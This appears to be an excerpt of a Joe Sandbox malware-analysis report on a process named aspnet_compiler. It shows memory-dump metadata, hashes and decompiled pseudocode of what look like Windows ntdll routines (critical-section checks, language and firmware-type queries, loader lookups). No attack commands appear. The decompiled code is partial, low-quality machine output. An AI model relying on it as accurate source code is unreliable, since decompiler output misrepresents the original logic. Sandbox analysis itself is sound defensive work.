                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                                                        • API String ID: 0-1757540487
                                                                                        • Opcode ID: ab2a8e24b628e6f0aea867aed0ae129fac68873bb71142377a6ec8ab7345e371
                                                                                        • Instruction ID: b6915100a45d6024139abebde6e9c7cf46060c1b0a27cea52a8f85ed21a4fb45
                                                                                        • Opcode Fuzzy Hash: ab2a8e24b628e6f0aea867aed0ae129fac68873bb71142377a6ec8ab7345e371
                                                                                        • Instruction Fuzzy Hash: BF51C3726093469BDB1CDF28C444A6FB7E9BF88618F05092EFA95D7250F734D904C7A2
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0122FF10 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 44timeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 0122FF60
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID: DebugPrintTimes
                                                                                        • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                                                                        • API String ID: 3446177414-1911121157
                                                                                        • Opcode ID: bb3cea0d5e4d9ec20ee23ec079553c3d676a81cce50c32ea27d54fa6ecc92f91
                                                                                        • Instruction ID: 32a20509c1172b33dab9161f1fec287aecc2d942c06142d8d5f8f5944cb87755
                                                                                        • Opcode Fuzzy Hash: bb3cea0d5e4d9ec20ee23ec079553c3d676a81cce50c32ea27d54fa6ecc92f91
                                                                                        • Instruction Fuzzy Hash: ED11A171561655EFEF26EF94CA49F9C7BB1BB08B04F148058E6045B1A1C7799940CB90
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0125E539 Relevance: 2.8, Strings: 2, Instructions: 261COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 60%
                                                                                        			E0125E539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v40;
				char _v44;
				intOrPtr _v48;
				signed int _v52;
				unsigned int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				signed int _v72;
				void* __ebx;
				void* __edi;
				char _t87;
				signed int _t90;
				signed int _t94;
				signed int _t100;
				intOrPtr* _t113;
				signed int _t122;
				void* _t132;
				void* _t135;
				signed int _t139;
				signed int* _t141;
				signed int _t146;
				signed int _t147;
				void* _t153;
				signed int _t155;
				signed int _t159;
				char _t166;
				void* _t172;
				void* _t176;
				signed int _t177;
				intOrPtr* _t179;

				_t179 = __ecx;
				_v48 = __edx;
				_v68 = 0;
				_v72 = 0;
				_push(__ecx[1]);
				_push( *__ecx);
				_push(0);
				_t153 = 0x14;
				_t135 = _t153;
				_t132 = E0125BBBB(_t135, _t153);
				if(_t132 == 0) {
					_t166 = _v68;
					goto L43;
				} else {
					_t155 = 0;
					_v52 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v56 = __ecx[1];
					if( *__ecx >> 8 < 2) {
						_t155 = 1;
						_v52 = 1;
					}
					_t139 = _a4;
					_t87 = (_t155 << 0xc) + _t139;
					_v60 = _t87;
					if(_t87 < _t139) {
						L11:
						_t166 = _v68;
						L12:
						if(_t132 != 0) {
							E0125BCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
						}
						L43:
						if(_v72 != 0) {
							_push( *((intOrPtr*)(_t179 + 4)));
							_push( *_t179);
							_push(0x8000);
							E0125AFDE( &_v72,  &_v60);
						}
						L46:
						return _t166;
					}
					_t90 =  *(_t179 + 0xc) & 0x40000000;
					asm("sbb edi, edi");
					_t172 = ( ~_t90 & 0x0000003c) + 4;
					if(_t90 != 0) {
						_push(0);
						_push(0x14);
						_push( &_v44);
						_push(3);
						_push(_t179);
						_push(0xffffffff);
						if(E011D9730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
							_push(_t139);
							E0125A80D(_t179, 1, _v40, 0);
							_t172 = 4;
						}
					}
					_t141 =  &_v72;
					if(E0125A854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
						_v64 = _a4;
						_t94 =  *(_t179 + 0xc) & 0x40000000;
						asm("sbb edi, edi");
						_t176 = ( ~_t94 & 0x0000003c) + 4;
						if(_t94 != 0) {
							_push(0);
							_push(0x14);
							_push( &_v24);
							_push(3);
							_push(_t179);
							_push(0xffffffff);
							if(E011D9730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
								_push(_t141);
								E0125A80D(_t179, 1, _v20, 0);
								_t176 = 4;
							}
						}
						if(E0125A854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
							goto L11;
						} else {
							_t177 = _v64;
							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
							_t100 = _v52 + _v52;
							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
							 *(_t132 + 0x10) = _t146;
							asm("bsf eax, [esp+0x18]");
							_v52 = _t100;
							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
							_t47 =  &_a8;
							 *_t47 = _a8 & 0x00000001;
							if( *_t47 == 0) {
								E011B2280(_t179 + 0x30, _t179 + 0x30);
							}
							_t147 =  *(_t179 + 0x34);
							_t159 =  *(_t179 + 0x38) & 1;
							_v68 = 0;
							if(_t147 == 0) {
								L35:
								E011AB090(_t179 + 0x34, _t147, _v68, _t132);
								if(_a8 == 0) {
									E011AFFB0(_t132, _t177, _t179 + 0x30);
								}
								asm("lock xadd [eax], ecx");
								asm("lock xadd [eax], edx");
								_t132 = 0;
								_v72 = _v72 & 0;
								_v68 = _v72;
								if(E011B7D50() == 0) {
									_t113 = 0x7ffe0388;
								} else {
									_t177 = _v64;
									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
								}
								if( *_t113 == _t132) {
									_t166 = _v68;
									goto L46;
								} else {
									_t166 = _v68;
									E0124FEC0(_t132, _t179, _t166, _t177 + 0x1000);
									goto L12;
								}
							} else {
								L23:
								while(1) {
									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
										_t122 =  *_t147;
										if(_t159 == 0) {
											L32:
											if(_t122 == 0) {
												L34:
												_v68 = 0;
												goto L35;
											}
											L33:
											_t147 = _t122;
											continue;
										}
										if(_t122 == 0) {
											goto L34;
										}
										_t122 = _t122 ^ _t147;
										goto L32;
									}
									_t122 =  *(_t147 + 4);
									if(_t159 == 0) {
										L27:
										if(_t122 != 0) {
											goto L33;
										}
										L28:
										_v68 = 1;
										goto L35;
									}
									if(_t122 == 0) {
										goto L28;
									}
									_t122 = _t122 ^ _t147;
									goto L27;
								}
							}
						}
					}
					_v72 = _v72 & 0x00000000;
					goto L11;
				}
			}




































                                                                                        0x0125e547
                                                                                        0x0125e549
                                                                                        0x0125e54f
                                                                                        0x0125e553
                                                                                        0x0125e557
                                                                                        0x0125e55a
                                                                                        0x0125e55c
                                                                                        0x0125e55f
                                                                                        0x0125e561
                                                                                        0x0125e567
                                                                                        0x0125e56b
                                                                                        0x0125e7e2
                                                                                        0x00000000
                                                                                        0x0125e571
                                                                                        0x0125e575
                                                                                        0x0125e577
                                                                                        0x0125e57b
                                                                                        0x0125e57c
                                                                                        0x0125e57d
                                                                                        0x0125e57e
                                                                                        0x0125e57f
                                                                                        0x0125e588
                                                                                        0x0125e58f
                                                                                        0x0125e591
                                                                                        0x0125e592
                                                                                        0x0125e592
                                                                                        0x0125e596
                                                                                        0x0125e59e
                                                                                        0x0125e5a0
                                                                                        0x0125e5a6
                                                                                        0x0125e61d
                                                                                        0x0125e61d
                                                                                        0x0125e621
                                                                                        0x0125e623
                                                                                        0x0125e630
                                                                                        0x0125e630
                                                                                        0x0125e7e6
                                                                                        0x0125e7eb
                                                                                        0x0125e7ed
                                                                                        0x0125e7f4
                                                                                        0x0125e7fa
                                                                                        0x0125e7ff
                                                                                        0x0125e7ff
                                                                                        0x0125e80a
                                                                                        0x0125e812
                                                                                        0x0125e812
                                                                                        0x0125e5ab
                                                                                        0x0125e5b4
                                                                                        0x0125e5b9
                                                                                        0x0125e5be
                                                                                        0x0125e5c0
                                                                                        0x0125e5c2
                                                                                        0x0125e5c8
                                                                                        0x0125e5c9
                                                                                        0x0125e5cb
                                                                                        0x0125e5cc
                                                                                        0x0125e5d5
                                                                                        0x0125e5e4
                                                                                        0x0125e5f1
                                                                                        0x0125e5f8
                                                                                        0x0125e5f8
                                                                                        0x0125e5d5
                                                                                        0x0125e602
                                                                                        0x0125e616
                                                                                        0x0125e63d
                                                                                        0x0125e644
                                                                                        0x0125e64d
                                                                                        0x0125e652
                                                                                        0x0125e657
                                                                                        0x0125e659
                                                                                        0x0125e65b
                                                                                        0x0125e661
                                                                                        0x0125e662
                                                                                        0x0125e664
                                                                                        0x0125e665
                                                                                        0x0125e66e
                                                                                        0x0125e67d
                                                                                        0x0125e68a
                                                                                        0x0125e691
                                                                                        0x0125e691
                                                                                        0x0125e66e
                                                                                        0x0125e6b0
                                                                                        0x00000000
                                                                                        0x0125e6b6
                                                                                        0x0125e6bd
                                                                                        0x0125e6c7
                                                                                        0x0125e6d7
                                                                                        0x0125e6d9
                                                                                        0x0125e6db
                                                                                        0x0125e6de
                                                                                        0x0125e6e3
                                                                                        0x0125e6f3
                                                                                        0x0125e6fc
                                                                                        0x0125e700
                                                                                        0x0125e700
                                                                                        0x0125e704
                                                                                        0x0125e70a
                                                                                        0x0125e70a
                                                                                        0x0125e713
                                                                                        0x0125e716
                                                                                        0x0125e719
                                                                                        0x0125e720
                                                                                        0x0125e761
                                                                                        0x0125e76b
                                                                                        0x0125e774
                                                                                        0x0125e77a
                                                                                        0x0125e77a
                                                                                        0x0125e78a
                                                                                        0x0125e791
                                                                                        0x0125e799
                                                                                        0x0125e79b
                                                                                        0x0125e79f
                                                                                        0x0125e7aa
                                                                                        0x0125e7c0
                                                                                        0x0125e7ac
                                                                                        0x0125e7b2
                                                                                        0x0125e7b9
                                                                                        0x0125e7b9
                                                                                        0x0125e7c7
                                                                                        0x0125e806
                                                                                        0x00000000
                                                                                        0x0125e7c9
                                                                                        0x0125e7d1
                                                                                        0x0125e7d8
                                                                                        0x00000000
                                                                                        0x0125e7d8
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0125e722
                                                                                        0x0125e72e
                                                                                        0x0125e748
                                                                                        0x0125e74c
                                                                                        0x0125e754
                                                                                        0x0125e756
                                                                                        0x0125e75c
                                                                                        0x0125e75c
                                                                                        0x00000000
                                                                                        0x0125e75c
                                                                                        0x0125e758
                                                                                        0x0125e758
                                                                                        0x00000000
                                                                                        0x0125e758
                                                                                        0x0125e750
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0125e752
                                                                                        0x00000000
                                                                                        0x0125e752
                                                                                        0x0125e730
                                                                                        0x0125e735
                                                                                        0x0125e73d
                                                                                        0x0125e73f
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0125e741
                                                                                        0x0125e741
                                                                                        0x00000000
                                                                                        0x0125e741
                                                                                        0x0125e739
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0125e73b
                                                                                        0x00000000
                                                                                        0x0125e73b
                                                                                        0x0125e722
                                                                                        0x0125e720
                                                                                        0x0125e6b0
                                                                                        0x0125e618
                                                                                        0x00000000
                                                                                        0x0125e618

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: `$`
                                                                                        • API String ID: 0-197956300
                                                                                        • Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                                                                        • Instruction ID: 9b38c6ed6ce93912a2feebcc7e5bd0875fee71ba6d1e65a2da45be45ddfd9aea
                                                                                        • Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                                                                        • Instruction Fuzzy Hash: 3291B1716143429FE768CE29C885B2BFBE5BF84714F15892DFA95CB280E770EA04CB51
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 012151BE Relevance: 2.7, Strings: 2, Instructions: 173COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 77%
                                                                                        			E012151BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				signed short* _t63;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				intOrPtr _t74;
				intOrPtr _t84;
				intOrPtr _t88;
				intOrPtr _t94;
				void* _t100;
				void* _t103;
				intOrPtr _t105;
				signed int _t106;
				short* _t108;
				signed int _t110;
				signed int _t113;
				signed int* _t115;
				signed short* _t117;
				void* _t118;
				void* _t119;

				_push(0x80);
				_push(0x12705f0);
				E011ED0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
				_t115 =  *(_t118 + 0xc);
				 *(_t118 - 0x7c) = _t115;
				 *((char*)(_t118 - 0x65)) = 0;
				 *((intOrPtr*)(_t118 - 0x64)) = 0;
				_t113 = 0;
				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
				 *((intOrPtr*)(_t118 - 4)) = 0;
				_t100 = __ecx;
				if(_t100 == 0) {
					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
					E011AEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *((char*)(_t118 - 0x65)) = 1;
					_t63 =  *(_t118 - 0x90);
					_t101 = _t63[2];
					_t64 =  *_t63 & 0x0000ffff;
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					L20:
					_t65 = _t64 >> 1;
					L21:
					_t108 =  *((intOrPtr*)(_t118 - 0x80));
					if(_t108 == 0) {
						L27:
						 *_t115 = _t65 + 1;
						_t67 = 0xc0000023;
						L28:
						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
						L29:
						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
						E012153CA(0);
						return E011ED130(0, _t113, _t115);
					}
					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
							 *_t108 = 0;
						}
						goto L27;
					}
					 *_t115 = _t65;
					_t115 = _t65 + _t65;
					E011DF3E0(_t108, _t101, _t115);
					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
					_t67 = 0;
					goto L28;
				}
				_t103 = _t100 - 1;
				if(_t103 == 0) {
					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
					_t74 = E011B3690(1, _t117, 0x1171810, _t118 - 0x74);
					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
					_t101 = _t117[2];
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					if(_t74 < 0) {
						_t64 =  *_t117 & 0x0000ffff;
						_t115 =  *(_t118 - 0x7c);
						goto L20;
					}
					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
					_t115 =  *(_t118 - 0x7c);
					goto L21;
				}
				if(_t103 == 1) {
					_t105 = 4;
					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
					 *((intOrPtr*)(_t118 - 0x70)) = 0;
					_push(_t118 - 0x70);
					_push(0);
					_push(0);
					_push(_t105);
					_push(_t118 - 0x78);
					_push(0x6b);
					 *((intOrPtr*)(_t118 - 0x64)) = E011DAA90();
					 *((intOrPtr*)(_t118 - 0x64)) = 0;
					_t113 = L011B4620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
					if(_t113 != 0) {
						_push(_t118 - 0x70);
						_push( *((intOrPtr*)(_t118 - 0x70)));
						_push(_t113);
						_push(4);
						_push(_t118 - 0x78);
						_push(0x6b);
						_t84 = E011DAA90();
						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
						if(_t84 < 0) {
							goto L29;
						}
						_t110 = 0;
						_t106 = 0;
						while(1) {
							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
							 *(_t118 - 0x88) = _t106;
							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
								break;
							}
							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
							_t106 = _t106 + 1;
						}
						_t88 = E0121500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
						_t119 = _t119 + 0x1c;
						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
						if(_t88 < 0) {
							goto L29;
						}
						_t101 = _t118 - 0x3c;
						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
						goto L21;
					}
					_t67 = 0xc0000017;
					goto L28;
				}
				_push(0);
				_push(0x20);
				_push(_t118 - 0x60);
				_push(0x5a);
				_t94 = E011D9860();
				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
				if(_t94 < 0) {
					goto L29;
				}
				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
					_t101 = L"Legacy";
					_push(6);
				} else {
					_t101 = L"UEFI";
					_push(4);
				}
				_pop(_t65);
				goto L21;
			}






















                                                                                        0x012151be
                                                                                        0x012151c3
                                                                                        0x012151c8
                                                                                        0x012151cd
                                                                                        0x012151d0
                                                                                        0x012151d3
                                                                                        0x012151d8
                                                                                        0x012151db
                                                                                        0x012151de
                                                                                        0x012151e0
                                                                                        0x012151e3
                                                                                        0x012151e6
                                                                                        0x012151e8
                                                                                        0x01215342
                                                                                        0x01215351
                                                                                        0x01215356
                                                                                        0x0121535a
                                                                                        0x01215360
                                                                                        0x01215363
                                                                                        0x01215366
                                                                                        0x01215369
                                                                                        0x01215369
                                                                                        0x0121536b
                                                                                        0x0121536b
                                                                                        0x01215370
                                                                                        0x012153a3
                                                                                        0x012153a4
                                                                                        0x012153a6
                                                                                        0x012153ab
                                                                                        0x012153ab
                                                                                        0x012153ae
                                                                                        0x012153ae
                                                                                        0x012153b5
                                                                                        0x012153bf
                                                                                        0x012153bf
                                                                                        0x01215375
                                                                                        0x01215396
                                                                                        0x012153a0
                                                                                        0x012153a0
                                                                                        0x00000000
                                                                                        0x01215396
                                                                                        0x01215377
                                                                                        0x01215379
                                                                                        0x0121537f
                                                                                        0x0121538c
                                                                                        0x01215390
                                                                                        0x00000000
                                                                                        0x01215390
                                                                                        0x012151ee
                                                                                        0x012151f1
                                                                                        0x01215301
                                                                                        0x01215310
                                                                                        0x01215315
                                                                                        0x01215318
                                                                                        0x0121531b
                                                                                        0x01215320
                                                                                        0x0121532e
                                                                                        0x01215331
                                                                                        0x00000000
                                                                                        0x01215331
                                                                                        0x01215328
                                                                                        0x01215329
                                                                                        0x00000000
                                                                                        0x01215329
                                                                                        0x012151fa
                                                                                        0x01215235
                                                                                        0x01215236
                                                                                        0x01215239
                                                                                        0x0121523f
                                                                                        0x01215240
                                                                                        0x01215241
                                                                                        0x01215242
                                                                                        0x01215246
                                                                                        0x01215247
                                                                                        0x0121524e
                                                                                        0x01215251
                                                                                        0x01215267
                                                                                        0x01215269
                                                                                        0x0121526e
                                                                                        0x0121527d
                                                                                        0x0121527e
                                                                                        0x01215281
                                                                                        0x01215282
                                                                                        0x01215287
                                                                                        0x01215288
                                                                                        0x0121528a
                                                                                        0x0121528f
                                                                                        0x01215294
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0121529a
                                                                                        0x0121529c
                                                                                        0x0121529e
                                                                                        0x0121529e
                                                                                        0x012152a4
                                                                                        0x012152b0
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x012152ba
                                                                                        0x012152bc
                                                                                        0x012152bc
                                                                                        0x012152d4
                                                                                        0x012152d9
                                                                                        0x012152dc
                                                                                        0x012152e1
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x012152e7
                                                                                        0x012152f4
                                                                                        0x00000000
                                                                                        0x012152f4
                                                                                        0x01215270
                                                                                        0x00000000
                                                                                        0x01215270
                                                                                        0x012151fc
                                                                                        0x012151fd
                                                                                        0x01215202
                                                                                        0x01215203
                                                                                        0x01215205
                                                                                        0x0121520a
                                                                                        0x0121520f
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0121521b
                                                                                        0x01215226
                                                                                        0x0121522b
                                                                                        0x0121521d
                                                                                        0x0121521d
                                                                                        0x01215222
                                                                                        0x01215222
                                                                                        0x0121522d
                                                                                        0x00000000

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID: Legacy$UEFI
                                                                                        • API String ID: 2994545307-634100481
                                                                                        • Opcode ID: d3bd3b71d06dfab217a99adfbc2a9215d1d6cbf910d65b32401fdee9f8340cee
                                                                                        • Instruction ID: c2efbe321823db8935cc7e1725d02cac5307d68bcc6c30c8170e66d6198e91b9
                                                                                        • Opcode Fuzzy Hash: d3bd3b71d06dfab217a99adfbc2a9215d1d6cbf910d65b32401fdee9f8340cee
                                                                                        • Instruction Fuzzy Hash: CD519171E106199FDB24DFA8C840BAEBBF8FFA9704F14406DE609EB255D7719901CB50
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 011AD5E0 Relevance: 1.9, APIs: 1, Instructions: 353timeCOMMONCrypto
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 87%
                                                                                        			E011AD5E0(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16, signed int _a20, signed int _a24) {
				signed int _v8;
				intOrPtr _v20;
				signed int _v36;
				intOrPtr* _v40;
				signed int _v44;
				signed int _v48;
				signed char _v52;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				intOrPtr _v120;
				signed int _v132;
				char _v140;
				char _v144;
				char _v157;
				signed int _v164;
				signed int _v168;
				signed int _v169;
				intOrPtr _v176;
				signed int _v180;
				signed int _v184;
				intOrPtr _v188;
				signed int _v192;
				signed int _v200;
				signed int _v208;
				intOrPtr* _v212;
				char _v216;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t204;
				signed int _t206;
				void* _t208;
				signed int _t211;
				signed int _t216;
				intOrPtr _t217;
				intOrPtr* _t218;
				signed int _t226;
				signed int _t239;
				signed int* _t247;
				signed int _t249;
				void* _t252;
				signed int _t256;
				signed int _t269;
				signed int _t271;
				signed int _t277;
				signed int _t279;
				intOrPtr _t283;
				signed int _t287;
				signed int _t288;
				void* _t289;
				signed char _t290;
				signed int _t292;
				signed int* _t293;
				unsigned int _t297;
				signed int _t306;
				signed int _t307;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				intOrPtr _t311;
				intOrPtr _t312;
				signed int _t319;
				signed int _t320;
				signed int* _t324;
				signed int _t337;
				signed int _t338;
				signed int _t339;
				signed int* _t340;
				void* _t341;
				signed int _t344;
				signed int _t348;
				signed int _t349;
				signed int _t351;
				intOrPtr _t353;
				void* _t354;
				signed int _t356;
				signed int _t358;
				intOrPtr _t359;
				signed int _t361;
				signed int _t363;
				signed short* _t365;
				void* _t367;
				intOrPtr _t369;
				void* _t370;
				signed int _t371;
				signed int _t372;
				void* _t374;
				signed int _t376;
				void* _t384;
				signed int _t387;

				_v8 =  *0x128d360 ^ _t376;
				_t2 =  &_a20;
				 *_t2 = _a20 & 0x00000001;
				_t287 = _a4;
				_v200 = _a12;
				_t365 = _a8;
				_v212 = _a16;
				_v180 = _a24;
				_v168 = 0;
				_v157 = 0;
				if( *_t2 != 0) {
					__eflags = E011A6600(0x12852d8);
					if(__eflags == 0) {
						goto L1;
					} else {
						_v188 = 6;
					}
				} else {
					L1:
					_v188 = 9;
				}
				if(_t365 == 0) {
					_v164 = 0;
					goto L5;
				} else {
					_t363 =  *_t365 & 0x0000ffff;
					_t341 = _t363 + 1;
					if((_t365[1] & 0x0000ffff) < _t341) {
						L109:
						__eflags = _t341 - 0x80;
						if(_t341 <= 0x80) {
							_t281 =  &_v140;
							_v164 =  &_v140;
							goto L114;
						} else {
							_t283 =  *0x1287b9c; // 0x0
							_t281 = L011B4620(_t341,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t283 + 0x180000, _t341);
							_v164 = _t281;
							__eflags = _t281;
							if(_t281 != 0) {
								_v157 = 1;
								L114:
								E011DF3E0(_t281, _t365[2], _t363);
								_t200 = _v164;
								 *((char*)(_v164 + _t363)) = 0;
								goto L5;
							} else {
								_t204 = 0xc000009a;
								goto L47;
							}
						}
					} else {
						_t200 = _t365[2];
						_v164 = _t200;
						if( *((char*)(_t200 + _t363)) != 0) {
							goto L109;
						} else {
							while(1) {
								L5:
								_t353 = 0;
								_t342 = 0x1000;
								_v176 = 0;
								if(_t287 == 0) {
									break;
								}
								_t384 = _t287 -  *0x1287b90; // 0x77d00000
								if(_t384 == 0) {
									_t353 =  *0x1287b8c; // 0xbc2b00
									_v176 = _t353;
									_t320 = ( *(_t353 + 0x50))[8];
									_v184 = _t320;
								} else {
									E011B2280(_t200, 0x12884d8);
									_t277 =  *0x12885f4; // 0xbc2ff0
									_t351 =  *0x12885f8 & 1;
									while(_t277 != 0) {
										_t337 =  *(_t277 - 0x50);
										if(_t337 > _t287) {
											_t338 = _t337 | 0xffffffff;
										} else {
											asm("sbb ecx, ecx");
											_t338 =  ~_t337;
										}
										_t387 = _t338;
										if(_t387 < 0) {
											_t339 =  *_t277;
											__eflags = _t351;
											if(_t351 != 0) {
												__eflags = _t339;
												if(_t339 == 0) {
													goto L16;
												} else {
													goto L118;
												}
												goto L151;
											} else {
												goto L16;
											}
											goto L17;
										} else {
											if(_t387 <= 0) {
												__eflags = _t277;
												if(_t277 != 0) {
													_t340 =  *(_t277 - 0x18);
													_t24 = _t277 - 0x68; // 0xbc2f88
													_t353 = _t24;
													_v176 = _t353;
													__eflags = _t340[3] - 0xffffffff;
													if(_t340[3] != 0xffffffff) {
														_t279 =  *_t340;
														__eflags =  *(_t279 - 0x20) & 0x00000020;
														if(( *(_t279 - 0x20) & 0x00000020) == 0) {
															asm("lock inc dword [edi+0x9c]");
															_t340 =  *(_t353 + 0x50);
														}
													}
													_v184 = _t340[8];
												}
											} else {
												_t339 =  *(_t277 + 4);
												if(_t351 != 0) {
													__eflags = _t339;
													if(_t339 == 0) {
														goto L16;
													} else {
														L118:
														_t277 = _t277 ^ _t339;
														goto L17;
													}
													goto L151;
												} else {
													L16:
													_t277 = _t339;
												}
												goto L17;
											}
										}
										goto L25;
										L17:
									}
									L25:
									E011AFFB0(_t287, _t353, 0x12884d8);
									_t320 = _v184;
									_t342 = 0x1000;
								}
								if(_t353 == 0) {
									break;
								} else {
									_t366 = 0;
									if(( *( *[fs:0x18] + 0xfca) & _t342) != 0 || _t320 >= _v188) {
										_t288 = _v164;
										if(_t353 != 0) {
											_t342 = _t288;
											_t374 = E011ECC99(_t353, _t288, _v200, 1,  &_v168);
											if(_t374 >= 0) {
												if(_v184 == 7) {
													__eflags = _a20;
													if(__eflags == 0) {
														__eflags =  *( *[fs:0x18] + 0xfca) & 0x00001000;
														if(__eflags != 0) {
															_t271 = E011A6600(0x12852d8);
															__eflags = _t271;
															if(__eflags == 0) {
																_t342 = 0;
																_v169 = _t271;
																_t374 = E011A7926( *(_t353 + 0x50), 0,  &_v169);
															}
														}
													}
												}
												if(_t374 < 0) {
													_v168 = 0;
												} else {
													if( *0x128b239 != 0) {
